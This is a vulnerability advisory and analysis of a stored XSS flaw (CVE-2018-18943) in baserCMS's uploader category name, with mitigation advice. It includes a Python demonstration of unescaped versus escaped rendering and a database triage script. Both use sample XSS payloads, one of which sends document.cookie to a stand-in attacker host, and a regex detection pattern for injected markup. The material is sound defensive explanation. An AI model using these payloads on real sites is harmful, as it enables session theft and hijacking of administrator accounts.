CVE-2018-18943 in BaserCMS
Summary
by MITRE
An issue was discovered in baserCMS before 4.1.4. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the data[UploaderCategory][name] parameter to an admin/uploader/uploader_categories/edit URI.
Analysis
by VulDB Data Team • 04/10/2020
The flaw affects baserCMS releases before 4.1.4, in the Register New Category feature of the administrative uploader. The category name submitted in the data[UploaderCategory][name] parameter to admin/uploader/uploader_categories/edit is stored and later rendered in the administrative interface without adequate escaping, so any markup or script placed in the name is interpreted by the browser. The root cause is missing context-aware output encoding of the category name at render time; input validation on the field is also weak, but encoding on output is the control that actually prevents XSS. Because the endpoint lives under admin/, planting the payload requires a session that can reach the uploader's category management; the advisory does not say which roles that includes.
This is stored XSS (CWE-79): the attacker's input persists in the database and is written into every page that displays the category name, so it executes in the browser of any other user, administrators included, who later opens the affected screen. From there the script can read whatever that session can read, submit forms with the victim's privileges, exfiltrate session identifiers if the cookie is not HttpOnly, or redirect the victim to an attacker-controlled site. That the payload lands in an administrative context is what makes it serious: the victims are the most privileged users of the site.
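To make the CWE-79 pattern concrete, here is an added example (not baserCMS code; the template fragment, the function names and the attacker payload are hypothetical) that renders a category name into a table cell and an input field the way a vulnerable admin view would, beside the same row with context-aware escaping. Both renderings are fed through Python's HTML parser to show that the unescaped version yields script elements and truncates the attribute, while the escaped version round-trips the original name unchanged:

```python
import html
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Constructed attacker payload for data[UploaderCategory][name] (illustrative only).
# It closes the attribute it lands in and then opens a <script> element.
HOSTILE_NAME = (
    '"><script>document.location="http://attacker.example/?c="'
    '+document.cookie</script>'
)

# Hypothetical admin view fragment; baserCMS's real templates are not reproduced here.
ROW_TEMPLATE = (
    '<tr><td>{name}</td>'
    '<td><input type="text" name="data[UploaderCategory][name]" value="{name}"></td></tr>'
)


def render_row_vulnerable(name: str) -> str:
    """The bug class: the stored name goes into element text and an attribute as-is."""
    return ROW_TEMPLATE.format(name=name)


def render_row_fixed(name: str) -> str:
    """Context-aware encoding: html.escape(quote=True) is correct for both element
    text and a double-quoted attribute because it encodes & < > " and '."""
    return ROW_TEMPLATE.format(name=html.escape(name, quote=True))


class _Collector(HTMLParser):
    """Records the start tags a browser would see and the category input's parsed value."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.input_value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attr_map = dict(attrs)
        if tag == "input" and attr_map.get("name") == "data[UploaderCategory][name]":
            self.input_value = attr_map.get("value")


def analyse(rendered: str) -> Tuple[List[str], Optional[str]]:
    """Return (start tags in document order, unescaped value of the category input)."""
    parser = _Collector()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.input_value


if __name__ == "__main__":
    for label, render in (("vulnerable", render_row_vulnerable), ("fixed", render_row_fixed)):
        tags, value = analyse(render(HOSTILE_NAME))
        print(f"{label}: script elements={tags.count('script')} input value={value!r}")
```

The parser sees two script elements in the vulnerable output, one from the cell text and one from the broken-out attribute, and the input's value collapses to an empty string; in the fixed output there is no script element and the input's value parses back to exactly what the user typed, which is the point of encoding rather than stripping.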
The operational impact goes beyond the script itself: the payload runs with the rights of whichever administrator's browser renders it, so an attacker can drive that session to create or modify content, change account settings, or perform any other action the admin interface exposes, and thereby keep a foothold in the application. Integrity and confidentiality of the CMS are affected through script execution inside administrative browser sessions, not through code execution on the server. In ATT&CK terms this maps to T1059.007 (Command and Scripting Interpreter: JavaScript); Phishing (T1566.002, Spearphishing Link) is relevant only if the attacker needs to lure an administrator to the affected page, since a stored payload otherwise fires whenever that page is viewed in the normal course of administration.
Upgrade to baserCMS 4.1.4 or later, which corrects the handling of the uploader category name. Beyond the patch, encode every user-supplied value at the point where it is written into HTML, with the escaping appropriate to the context (element text, attribute value, URL, JavaScript), rather than relying on input filtering alone; in CakePHP-based code such as baserCMS that means passing values through the h() helper in templates. A Content Security Policy that disallows inline script limits the impact of any encoding gap, and marking session cookies HttpOnly blunts the most common post-exploitation step. Regular review of administrative templates for unescaped output, restricting the admin interface to trusted networks, and checking stored category names for markup that a human-typed label would not contain (which would indicate an already exploited instance) round out the response.
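As an added example of how to check whether an instance running a version before 4.1.4 was already exploited (a complement to the monitoring mentioned above; not a baserCMS tool, and the table name uploader_categories and the rows below are constructed for illustration), this script pulls category names out of a database and flags the ones carrying tags, event handlers, javascript: URLs or character references:

```python
import re
import sqlite3
from typing import List, Tuple

# Narrow set of things a human-typed category label should never contain.
# Deliberately not a full XSS detector: the aim is triage of stored values.
MARKUP_RE = re.compile(
    r"<\s*/?[a-z!]"          # opening/closing tag or comment start ("5 < 10" is fine)
    r"|javascript\s*:"       # javascript: URLs in href/src
    r"|\bon[a-z]+\s*="       # inline event handler attributes
    r"|&#x?[0-9a-f]+;"       # numeric character references
    r"|&(?:lt|gt|quot);",    # named references for the characters that build tags
    re.IGNORECASE,
)

IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def looks_like_markup(name: str) -> bool:
    """True when a category name carries markup or script rather than a label."""
    return MARKUP_RE.search(name) is not None


def find_suspicious_categories(
    conn: sqlite3.Connection, table: str = "uploader_categories"
) -> List[Tuple[int, str]]:
    """Scan the category table and return (id, name) for every suspicious row.

    The table name is an assumption (real deployments usually prefix table names);
    it is validated as an identifier because it cannot be bound as a parameter.
    """
    if not IDENT_RE.fullmatch(table):
        raise ValueError(f"unsafe table name: {table!r}")
    rows = conn.execute(f"SELECT id, name FROM {table} ORDER BY id")
    return [(row_id, name) for row_id, name in rows if looks_like_markup(name)]


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a CMS database (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE uploader_categories (id INTEGER PRIMARY KEY, name TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO uploader_categories (id, name) VALUES (?, ?)",
        [
            (1, "Press photos"),
            (2, "Logos & icons"),  # a bare ampersand is ordinary text
            (3, "Q4 <script>alert(1)</script>"),
            (4, '" onmouseover="fetch(\'//attacker.example/?c=\'+document.cookie)'),
            (5, "Banners 2018"),
            (6, "&#60;img src=x onerror=alert(1)&#62;"),  # decoded into a tag by a careless view
            (7, "Prices where 5 < 10"),
        ],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    for row_id, name in find_suspicious_categories(build_sample_db()):
        print(f"category {row_id}: {name!r}")
```

Run against a real dump, the hits are the rows to inspect by hand (and to clean up before upgrading, since the patch stops new injections but does not rewrite what is already stored); the pattern list errs on the side of few false positives, so a clean result is evidence, not proof.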